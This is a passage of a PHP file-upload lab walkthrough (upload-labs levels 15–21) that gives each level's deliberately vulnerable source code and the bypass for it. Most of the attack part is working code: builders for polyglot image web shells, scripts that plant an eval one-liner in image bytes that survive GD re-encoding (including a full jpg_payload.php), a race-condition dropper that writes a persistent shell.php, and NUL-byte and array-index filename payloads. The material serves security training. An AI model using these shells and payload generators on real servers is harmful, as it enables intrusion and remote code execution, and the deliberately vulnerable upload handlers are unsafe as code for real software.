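        body = tag + payload
        return struct.pack(">I", len(payload)) + body + struct.pack(">I", zlib.crc32(body) & 0xFFFFFFFF)
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)   # width 1, height 1, 8-bit, colour type 2 (RGB)
    idat = zlib.compress(b"\x00\xff\x00\x00")             # filter type 0 + one red pixel
    return b"\x89PNG\r\n\x1a\n" + chunk(b"IHDR", ihdr) + chunk(b"IDAT", idat) + chunk(b"IEND", b"")


def get_real_file_type(data: bytes) -> str:
    """Port of the lab's getReailFileType(): unpack('C2chars') yields the first two bytes as
    unsigned ints and intval() of their decimal strings glued together is what gets compared."""
    if len(data) < 2:
        return "unknown"
    type_code = int(str(data[0]) + str(data[1]))   # 0xFF 0xD8 -> "255" + "216" -> 255216
    return {255216: "jpg", 13780: "png", 7173: "gif"}.get(type_code, "unknown")


def make_polyglot(image: bytes, php: bytes) -> bytes:
    """What `copy x.gif/b + x.php/a xx.gif` produces: image bytes first, PHP appended.
    Decoders stop at the GIF trailer or the PNG IEND chunk, so getimagesize() and
    exif_imagetype() still see a valid image; once the file is included or executed as PHP,
    the image bytes are emitted as literal output and the <?php ... ?> block runs."""
    return image + php


def payload_offset(polyglot: bytes) -> int:
    """Where the shell sits (-1 if absent); handy when moving it into the middle of a larger image."""
    return polyglot.find(b"<?php")


if __name__ == "__main__":
    for label, blob in (("gif shell", make_polyglot(MIN_GIF, WEBSHELL)),
                        ("png shell", make_polyglot(make_png_1x1(), WEBSHELL)),
                        ("wrong order", make_polyglot(WEBSHELL, MIN_GIF))):
        print(f"{label:12} detected as {get_real_file_type(blob)!r}, payload at {payload_offset(blob)}")
```

Write `make_polyglot(MIN_GIF, WEBSHELL)` to a file and it opens as a 1x1 image in any viewer; the "wrong order" case is exactly the broken copy x.php/a + x.gif/b output the writeup warns about.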

Level 16

Prerequisite: the php_exif extension must be enabled (PHP newer than 5.2.17).

    function isImage($filename){
        // requires the php_exif module
        $image_type = exif_imagetype($filename);
        switch ($image_type) {
            case IMAGETYPE_GIF:
                return "gif";
                break;
            case IMAGETYPE_JPEG:
                return "jpg";
                break;
            case IMAGETYPE_PNG:
                return "png";
                break;
            default:
                return false;
                break;
        }
    }

    $is_upload = false;
    $msg = null;
    if(isset($_POST['submit'])){
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $res = isImage($temp_file);
        if(!$res){
            $msg = "Unknown file type, upload failed!";
        }else{
            $img_path = $UPLOAD_ADDR."/".rand(10, 99).date("YmdHis").".".$res;
            if(move_uploaded_file($temp_file,$img_path)){
                $is_upload = true;
            }else{
                $msg = "Upload failed";
            }
        }
    }

Idea: exif_imagetype() only identifies the format from the file header, so an image shell passes exactly as before.

Level 17

    $is_upload = false;
    $msg = null;
    if (isset($_POST['submit'])){
        // basic information about the upload: name, MIME type, size, temporary path
        $filename = $_FILES['upload_file']['name'];
        $filetype = $_FILES['upload_file']['type'];
        $tmpname = $_FILES['upload_file']['tmp_name'];
        $target_path=$UPLOAD_ADDR.basename($filename);
        // extension of the uploaded file
        $fileext= substr(strrchr($filename,"."),1);
        // check extension and MIME type; only then move the file
        if(($fileext == "jpg") && ($filetype=="image/jpeg")){
            if(move_uploaded_file($tmpname,$target_path)){
                // generate a new image from the uploaded one
                $im = imagecreatefromjpeg($target_path);
                if($im == false){
                    $msg = "This file is not a jpg image!";
                }else{
                    // pick a name for the new image
                    srand(time());
                    $newfilename = strval(rand()).".jpg";
                    $newimagepath = $UPLOAD_ADDR.$newfilename;
                    imagejpeg($im,$newimagepath);
                    // display the re-rendered image (generated from the user's upload)
                    $img_path = $UPLOAD_ADDR.$newfilename;
                    unlink($target_path);
                    $is_upload = true;
                }
            }else{
                $msg = "Upload failed!";
            }
        }else if(($fileext == "png") && ($filetype=="image/png")){
            if(move_uploaded_file($tmpname,$target_path)){
                // generate a new image from the uploaded one
                $im = imagecreatefrompng($target_path);
                if($im == false){
                    $msg = "This file is not a png image!";
                }else{
                    // pick a name for the new image
                    srand(time());
                    $newfilename = strval(rand()).".png";
                    $newimagepath = $UPLOAD_ADDR.$newfilename;
                    imagepng($im,$newimagepath);
                    // display the re-rendered image (generated from the user's upload)
                    $img_path = $UPLOAD_ADDR.$newfilename;
                    unlink($target_path);
                    $is_upload = true;
                }
            }else{
                $msg = "Upload failed!";
            }
        }else if(($fileext == "gif") && ($filetype=="image/gif")){
            if(move_uploaded_file($tmpname,$target_path)){
                // generate a new image from the uploaded one
                $im = imagecreatefromgif($target_path);
                if($im == false){
                    $msg = "This file is not a gif image!";
                }else{
                    // pick a name for the new image
                    srand(time());
                    $newfilename = strval(rand()).".gif";
                    $newimagepath = $UPLOAD_ADDR.$newfilename;
                    imagegif($im,$newimagepath);
                    // display the re-rendered image (generated from the user's upload)
                    $img_path = $UPLOAD_ADDR.$newfilename;
                    unlink($target_path);
                    $is_upload = true;
                }
            }else{
                $msg = "Upload failed!";
            }
        }else{
            $msg = "Only image files with a .jpg|.png|.gif extension are allowed!";
        }
    }

The extension and the Content-Type are checked, the file is decoded with imagecreatefromjpeg()/imagecreatefrompng()/imagecreatefromgif(), and a fresh file is written with imagejpeg()/imagepng()/imagegif() (a "second render"); the original upload is deleted. All three formats are accepted, so the only question is which bytes of an image shell survive re-encoding.

(1) GIF is the easiest to craft: render the image once yourself, compare the bytes before and after, and put the one-liner into a region that did not change.
Code that performs the second render on a gif:

    <?php
    $newgif = imagecreatefromgif('D:\phpStudy\PHPTutorial\WWW\upload-labs\upload\x.gif');
    imagegif($newgif,'D:\phpStudy\PHPTutorial\WWW\upload-labs\upload\x1.gif');
    ?>

Then compare x.gif and x1.gif in WinHex and write the one-liner into a stretch that was not altered.
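The WinHex comparison can be automated: the following added example (not from the original writeup or from upload-labs) takes the bytes of x.gif and of the re-rendered x1.gif, lists every stretch that is identical at the same offset, and overwrites the first one past the 13-byte GIF header with the writeup's one-liner. For a GIF with a global colour table that stretch is normally the palette, which GD copies verbatim; the sample inputs below are constructed byte strings standing in for the two files.

```python
"""Locate bytes that survive GD's re-encoding and plant the one-liner there (level 17, GIF)."""
from typing import List, Optional, Tuple

GIF_HEADER_LEN = 13   # 6-byte signature/version + 7-byte logical screen descriptor: leave intact
SHELL = b"<?php @eval($_REQUEST[peak]);?>"


def stable_runs(original: bytes, rendered: bytes, min_len: int = 16) -> List[Tuple[int, int]]:
    """(offset, length) of every span that is byte-for-byte identical at the same offset in both
    files and at least min_len long: the side-by-side WinHex comparison, automated."""
    runs: List[Tuple[int, int]] = []
    start: Optional[int] = None
    n = min(len(original), len(rendered))
    for i in range(n + 1):
        same = i < n and original[i] == rendered[i]
        if same and start is None:
            start = i
        elif not same and start is not None:
            if i - start >= min_len:
                runs.append((start, i - start))
            start = None
    return runs


def inject_payload(rendered: bytes, payload: bytes, runs: List[Tuple[int, int]],
                   skip: int = GIF_HEADER_LEN) -> Optional[bytes]:
    """Overwrite (never insert: the file size and every later offset must stay the same) the first
    stable span past `skip` that can hold the payload; None if no span is large enough."""
    for off, length in runs:
        lo = max(off, skip)
        if off + length - lo >= len(payload):
            return rendered[:lo] + payload + rendered[lo + len(payload):]
    return None


def craft(original: bytes, rendered: bytes, payload: bytes = SHELL) -> Optional[bytes]:
    """Start from the *rendered* bytes, since that is what GD will reproduce, and patch them."""
    return inject_payload(rendered, payload, stable_runs(original, rendered))


if __name__ == "__main__":
    # Constructed stand-ins for x.gif and x1.gif: same header and palette, different image data.
    before = b"GIF89a" + bytes(range(40)) + b"tail-one"
    after = b"GIF89a" + bytes(range(40)) + b"tail-two"
    print(stable_runs(before, after, min_len=20))
    print(craft(before, after))
```

Re-render the patched file once more with the imagecreatefromgif()/imagegif() snippet above and check that the one-liner is still present before uploading it; positional comparison is only trustworthy for the leading header-plus-palette region, because once GD changes the length of a block every later offset shifts.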

(2) For PNG I used someone else's script, which produces a PNG whose one-liner survives the re-render; how it is built is explained at https://xz.aliyun.com/t/2657

    <?php
    $p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23, 0xbe, 0x2c, 0x8a, 0xd0,
               0x80, 0xf9, 0xe1, 0xae, 0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,
               0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f, 0x67, 0xa5, 0xbe, 0x5f,
               0x76, 0x74, 0x5a, 0x4c, 0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,
               0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1, 0x66, 0x44, 0x50, 0x33);

    $img = imagecreatetruecolor(32, 32);

    // the pixel values were chosen so that the deflate-compressed IDAT chunk contains the
    // short-tag PHP payload; re-encoding the same pixels with imagepng() reproduces those bytes
    for ($y = 0; $y < sizeof($p); $y += 3) {
        $r = $p[$y];
        $g = $p[$y+1];
        $b = $p[$y+2];
        $color = imagecolorallocate($img, $r, $g, $b);
        imagesetpixel($img, round($y / 3), 0, $color);
    }

    imagepng($img,'./1.png');
    ?>

Note that the backdoor generated this way uses the short open tag, so the server needs short_open_tag = On.

Exploitation: if eval does not work, try assert.

For jpg/jpeg, jpg_payload.php, also written by someone else (Sergey Bobrov), gets the payload past the re-render:

    <?php
    /*
    The algorithm of injecting the payload into the JPG image, which will keep unchanged after transformations caused by PHP functions imagecopyresized() and imagecopyresampled().

    It is necessary that the size and quality of the initial image are the same as those of the processed image.

    1) Upload an arbitrary image via secured files upload script
    2) Save the processed image and launch:
    jpg_payload.php <jpg_name.jpg>

    In case of successful injection you will get a specially crafted image, which should be uploaded again.

    Since the most straightforward injection method is used, the following problems can occur:
    1) After the second processing the injected data may become partially corrupted.
    2) The jpg_payload.php script outputs "Something's wrong".

    If this happens, try to change the payload (e.g. add some symbols at the beginning) or try another initial image.

    Sergey Bobrov @Black2Fan.

    See also:
    https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/
    */

    $miniPayload = '<?php @eval($_REQUEST[peak]);?>';

    if(!extension_loaded('gd') || !function_exists('imagecreatefromjpeg')) {
        die('php-gd is not installed');
    }

    if(!isset($argv[1])) {
        die('php jpg_payload.php <jpg_name.jpg>');
    }

    set_error_handler("custom_error_handler");

    for($pad = 0; $pad < 1024; $pad++) {
        $nullbytePayloadSize = $pad;
        $dis = new DataInputStream($argv[1]);
        $outStream = file_get_contents($argv[1]);
        $extraBytes = 0;
        $correctImage = TRUE;

        if($dis->readShort() != 0xFFD8) {
            die('Incorrect SOI marker');
        }

        // walk the JPEG segments until the Start Of Scan marker (0xDA)
        while((!$dis->eof()) && ($dis->readByte() == 0xFF)) {
            $marker = $dis->readByte();
            $size = $dis->readShort() - 2;
            $dis->skip($size);
            if($marker === 0xDA) {
                $startPos = $dis->seek();
                // first attempt: payload plus $pad NUL bytes inserted at the start of the scan data
                $outStreamTmp =
                    substr($outStream, 0, $startPos) .
                    $miniPayload .
                    str_repeat("\0",$nullbytePayloadSize) .
                    substr($outStream, $startPos);
                checkImage('_'.$argv[1], $outStreamTmp, TRUE);
                if($extraBytes !== 0) {
                    // GD complained about extraneous bytes: find the end of the scan data
                    // (next marker that is not a stuffed 0xFF00) and trim the stream to fit
                    while((!$dis->eof())) {
                        if($dis->readByte() === 0xFF) {
                            // the published script reads the property `$dis->readByte` here
                            // (always null, so the loop broke at the first 0xFF); the method call is intended
                            if($dis->readByte() !== 0x00) {
                                break;
                            }
                        }
                    }
                    $stopPos = $dis->seek() - 2;
                    $imageStreamSize = $stopPos - $startPos;
                    $outStream =
                        substr($outStream, 0, $startPos) .
                        $miniPayload .
                        substr(
                            str_repeat("\0",$nullbytePayloadSize).
                                substr($outStream, $startPos, $imageStreamSize),
                            0,
                            $nullbytePayloadSize+$imageStreamSize-$extraBytes) .
                                substr($outStream, $stopPos);
                } elseif($correctImage) {
                    $outStream = $outStreamTmp;
                } else {
                    break;
                }
                if(checkImage('payload_'.$argv[1], $outStream)) {
                    die('Success!');
                } else {
                    break;
                }
            }
        }
    }
    unlink('payload_'.$argv[1]);
    die('Something\'s wrong');

    // write the candidate to disk and let GD decode it; the error handler flips $correctImage
    function checkImage($filename, $data, $unlink = FALSE) {
        global $correctImage;
        file_put_contents($filename, $data);
        $correctImage = TRUE;
        imagecreatefromjpeg($filename);
        if($unlink)
            unlink($filename);
        return $correctImage;
    }

    function custom_error_handler($errno, $errstr, $errfile, $errline) {
        global $extraBytes, $correctImage;
        $correctImage = FALSE;
        if(preg_match('/(\d+) extraneous bytes before marker/', $errstr, $m)) {
            if(isset($m[1])) {
                $extraBytes = (int)$m[1];
            }
        }
    }

    // minimal big-endian byte reader over the file contents
    class DataInputStream {
        private $binData;
        private $order;
        private $size;

        public function __construct($filename, $order = false, $fromString = false) {
            $this->binData = '';
            $this->order = $order;
            if(!$fromString) {
                if(!file_exists($filename) || !is_file($filename))
                    die('File not exists ['.$filename.']');
                $this->binData = file_get_contents($filename);
            } else {
                $this->binData = $filename;
            }
            $this->size = strlen($this->binData);
        }

        public function seek() {
            return ($this->size - strlen($this->binData));
        }

        public function skip($skip) {
            $this->binData = substr($this->binData, $skip);
        }

        public function readByte() {
            if($this->eof()) {
                die('End Of File');
            }
            $byte = substr($this->binData, 0, 1);
            $this->binData = substr($this->binData, 1);
            return ord($byte);
        }

        public function readShort() {
            if(strlen($this->binData) < 2) {
                die('End Of File');
            }
            $short = substr($this->binData, 0, 2);
            $this->binData = substr($this->binData, 2);
            if($this->order) {
                $short = (ord($short[1]) << 8) + ord($short[0]);
            } else {
                $short = (ord($short[0]) << 8) + ord($short[1]);
            }
            return $short;
        }

        public function eof() {
            return !$this->binData||(strlen($this->binData) === 0);
        }
    }
    ?>

Prepare a jpg and run php jpg_payload.php x1.jpg from the directory that holds the image. The script names its working files by prefixing the argument ('_'.$argv[1] and 'payload_'.$argv[1]), so an argument with a directory component points them at a path that does not exist and you get "Something's wrong".





Level 18

    $is_upload = false;
    $msg = null;
    if(isset($_POST['submit'])){
        $ext_arr = array('jpg','png','gif');
        $file_name = $_FILES['upload_file']['name'];
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $file_ext = substr($file_name,strrpos($file_name,".")+1);
        $upload_file = $UPLOAD_ADDR . '/' . $file_name;
        if(move_uploaded_file($temp_file, $upload_file)){
            if(in_array($file_ext,$ext_arr)){
                $img_path = $UPLOAD_ADDR . '/'. rand(10, 99).date("YmdHis").".".$file_ext;
                rename($upload_file, $img_path);
                $is_upload = true;
            }else{
                $msg = "Only .jpg|.png|.gif files are allowed!";
                unlink($upload_file);
            }
        }else{
            $msg = 'Upload failed!';
        }
    }

Idea: the file is moved to the web root under its original name first, and only then either rename()d (allowed extension) or unlink()ed (anything else). Between the move and the unlink the .php exists and can be executed: a race condition.
Code that plants a persistent one-liner: <?php fputs(fopen('shell.php','w'),'<?php @eval($_REQUEST[peak]);?>');?>
Save it as 2.php and upload it over and over with Burp Intruder (set the thread count, then start).

In a second Intruder attack request the uploaded 2.php over and over (set the thread count, then start). As soon as one request reaches 2.php before unlink() runs, it writes shell.php, which nothing ever deletes.

Level 19

    //index.php
    $is_upload = false;
    $msg = null;
    if (isset($_POST['submit'])) {
        require_once("./myupload.php");
        $imgFileName =time();
        $u = new MyUpload($_FILES['upload_file']['name'], $_FILES['upload_file']['tmp_name'], $_FILES['upload_file']['size'],$imgFileName);
        $status_code = $u->upload($UPLOAD_ADDR);
        switch ($status_code) {
            case 1:
                $is_upload = true;
                $img_path = $u->cls_upload_dir . $u->cls_file_rename_to;
                break;
            case 2:
                $msg = 'The file was uploaded but not renamed.';
                break;
            case -1:
                $msg = 'This file cannot be uploaded to the temporary file directory of the server.';
                break;
            case -2:
                $msg = 'Upload failed, the upload directory is not writable.';
                break;
            case -3:
                $msg = 'Upload failed, this file type cannot be uploaded.';
                break;
            case -4:
                $msg = 'Upload failed, the uploaded file is too large.';
                break;
            case -5:
                $msg = 'Upload failed, a file with the same name already exists on the server.';
                break;
            case -6:
                $msg = 'The file cannot be uploaded, it could not be copied to the target directory.';
                break;
            default:
                $msg = 'Unknown error!';
                break;
        }
    }

    //myupload.php
    class MyUpload{
    ......
    ......
    ......
        var $cls_arr_ext_accepted = array(
            ".doc", ".xls", ".txt", ".pdf", ".gif", ".jpg", ".zip", ".rar", ".7z",".ppt",
            ".html", ".xml", ".tiff", ".jpeg", ".png" );
    ......
    ......
    ......
        /** upload()
        **
        ** Method to upload the file.
        ** This is the only method to call outside the class.
        ** @para String name of directory we upload to
        ** @returns void
        **/
        function upload( $dir ){
            $ret = $this->isUploadedFile();
            if( $ret != 1 ){
                return $this->resultUpload( $ret );
            }
            $ret = $this->setDir( $dir );
            if( $ret != 1 ){
                return $this->resultUpload( $ret );
            }
            $ret = $this->checkExtension();
            if( $ret != 1 ){
                return $this->resultUpload( $ret );
            }
            $ret = $this->checkSize();
            if( $ret != 1 ){
                return $this->resultUpload( $ret );
            }
            // if flag to check if the file exists is set to 1
            if( $this->cls_file_exists == 1 ){
                $ret = $this->checkFileExists();
                if( $ret != 1 ){
                    return $this->resultUpload( $ret );
                }
            }
            // if we are here, we are ready to move the file to destination
            $ret = $this->move();
            if( $ret != 1 ){
                return $this->resultUpload( $ret );
            }
            // check if we need to rename the file
            if( $this->cls_rename_file == 1 ){
                $ret = $this->renameFile();
                if( $ret != 1 ){
                    return $this->resultUpload( $ret );
                }
            }
            // if we are here, everything worked as planned :)
            return $this->resultUpload( "SUCCESS" );
        }
    ......
    ......
    ......
    };

Idea: MyUpload::upload() first stores the file under its original name (move()) and only afterwards renames it (renameFile()). The extension whitelist is checked before the move, so the file has to carry an accepted extension, and getting it executed needs a file-inclusion vulnerability.

Upload a 22.jpg file.

Then race the rename so the server has not yet renamed the file when you include it, with the same method as in level 18.

Level 20

    $is_upload = false;
    $msg = null;
    if (isset($_POST['submit'])) {
        if (file_exists($UPLOAD_ADDR)) {
            $deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht",
                "jsp","jspa","jspx","jsw","jsv","jspf","jtml",
                "asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");
            $file_name = $_POST['save_name'];
            $file_ext = pathinfo($file_name,PATHINFO_EXTENSION);
            if(!in_array($file_ext,$deny_ext)) {
                $img_path = $UPLOAD_ADDR . '/' .$file_name;
                if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $img_path)) {
                    $is_upload = true;
                }else{
                    $msg = 'Upload failed!';
                }
            }else{
                $msg = 'Saving as this file type is forbidden!';
            }
        } else {
            $msg = $UPLOAD_ADDR . ' folder does not exist, please create it manually!';
        }
    }

Idea: the extension is taken with pathinfo() from the user-supplied save_name, not from the uploaded file. Either use NUL truncation (save_name=xx.php%00.jpg with the %00 decoded to a raw NUL: pathinfo() sees "jpg", the file system stops at the NUL; same PHP < 5.3.4 caveat as in level 12), or exploit the fact that move_uploaded_file() ignores a trailing /. (save_name=xx.php/. gives pathinfo() an empty extension and still writes xx.php).


Level 21

    $is_upload = false;
    $msg = null;
    if(!empty($_FILES['upload_file'])){
        // check the MIME type
        $allow_type = array('image/jpeg','image/png','image/gif');
        if(!in_array($_FILES['upload_file']['type'],$allow_type)){
            $msg = "Uploading this file type is forbidden!";
        }else{
            // check the file name
            $file = empty($_POST['save_name']) ? $_FILES['upload_file']['name'] : $_POST['save_name'];
            if (!is_array($file)) {
                $file = explode('.', strtolower($file));
            }
            $ext = end($file);
            $allow_suffix = array('jpg','png','gif');
            if (!in_array($ext, $allow_suffix)) {
                $msg = "Uploading this extension is forbidden!";
            }else{
                $file_name = reset($file) . '.' . $file[count($file) - 1];
                $temp_file = $_FILES['upload_file']['tmp_name'];
                $img_path = UPLOAD_PATH . '/' .$file_name;
                if (move_uploaded_file($temp_file, $img_path)) {
                    $msg = "File uploaded successfully!";
                    $is_upload = true;
                } else {
                    $msg = "File upload failed!";
                }
            }
        }
    }else{
        $msg = "Please select a file to upload!";
    }

Idea: save_name can be submitted as an array, which skips explode() and lets us choose exactly what end(), reset() and $file[count($file)-1] see; combine that with the trailing /. trick from level 20.
Payload: with save_name[0]=xx.php/ and save_name[2]=jpg, end() returns "jpg" (whitelisted), count() is 2, $file[1] does not exist and reads as null, and $file_name becomes "xx.php/.", which move_uploaded_file() writes as xx.php.

Notes: the MIME type of the uploaded x.php must be changed to an image type; xx.php/ must carry nothing after the slash (in particular no dot); and the last array element can only be jpg, gif or png without a leading dot, because that element is what in_array() checks against the whitelist.
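Levels 20 and 21 both come down to what PHP's pathinfo(), end(), reset() and a missing array index return, so the following added example (not from the original writeup or from upload-labs) models those semantics in Python and computes the path the file actually lands at. php_pathinfo_extension() follows PHP's basename-then-last-dot rule (note that os.path.splitext would get '.htaccess' wrong); stored_path() encodes two assumptions the writeup relies on, NUL truncation below PHP 5.3.4 and a trailing "/." being resolved away, and the blacklist is an abbreviated subset of the lab's.

```python
"""Model of the level-20 pathinfo() check, the level-21 array trick, and the resulting path."""
import posixpath
from typing import Dict, Optional, Union

DENY = {"php", "php5", "php4", "php3", "php2", "html", "htm", "phtml", "pht", "jsp", "asp",
        "aspx", "cer", "swf", "htaccess"}          # abbreviated subset of the lab's list


def php_pathinfo_extension(path: str) -> str:
    """pathinfo($p, PATHINFO_EXTENSION): basename (trailing slashes ignored), then the text after
    the last dot. Unlike os.path.splitext, '.htaccess' yields 'htaccess' and 'x.php/.' yields ''."""
    base = path.rstrip("/").rsplit("/", 1)[-1]
    i = base.rfind(".")
    return base[i + 1:] if i != -1 else ""


def level20_allows(save_name: str) -> bool:
    return php_pathinfo_extension(save_name) not in DENY


def level21_file_name(save_name: Union[str, Dict[int, str]]) -> Optional[str]:
    """$file = is_array ? as-is : explode('.', strtolower($file)); $ext = end($file) must be allowed;
    $file_name = reset($file) . '.' . $file[count($file) - 1]. The keys of a submitted array need
    not be contiguous, and a missing key reads as null, i.e. '' once concatenated."""
    if isinstance(save_name, str):
        arr: Dict[int, str] = dict(enumerate(save_name.lower().split(".")))
    else:
        arr = dict(save_name)
    values = list(arr.values())
    if values[-1] not in {"jpg", "png", "gif"}:      # end($file) against the whitelist
        return None
    last = arr.get(len(arr) - 1)                      # $file[count($file) - 1]
    return values[0] + "." + ("" if last is None else last)   # reset($file) . '.' . ...


def stored_path(upload_dir: str, file_name: str, php_pre_534: bool = True) -> str:
    """Where move_uploaded_file() ends up writing. Assumptions: with PHP < 5.3.4 the C-level path
    ends at the first NUL byte; a trailing '/.' is resolved away, as the writeup states."""
    full = upload_dir + "/" + file_name
    if php_pre_534:
        full = full.split("\x00", 1)[0]
    return posixpath.normpath(full)


if __name__ == "__main__":
    for name in ("xx.php", "xx.php/.", "xx.php\x00.jpg"):
        print(f"level 20 {name!r:16} ext={php_pathinfo_extension(name)!r:6} "
              f"allowed={level20_allows(name)!s:5} -> {stored_path('../upload', name)!r}")
    for arr in ({0: "xx.php/", 2: "jpg"}, {0: "xx.php/", 1: "jpg"}, "xx.php"):
        fn = level21_file_name(arr)
        print(f"level 21 {arr!r:28} file_name={fn!r} -> "
              f"{stored_path('../upload', fn) if fn else 'rejected'}")
```

The gap at index 1 is the whole trick: with save_name[1]=jpg instead, $file_name becomes xx.php/.jpg and the write fails because xx.php is not a directory.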

References:
https://xz.aliyun.com/t/2435 (level 19)
https://xz.aliyun.com/t/4029#toc-20 (level 20)
https://zhuanlan.zhihu.com/p/52099683 (level 19)
https://www.jianshu.com/p/aabc1e7408d5 (level 20)
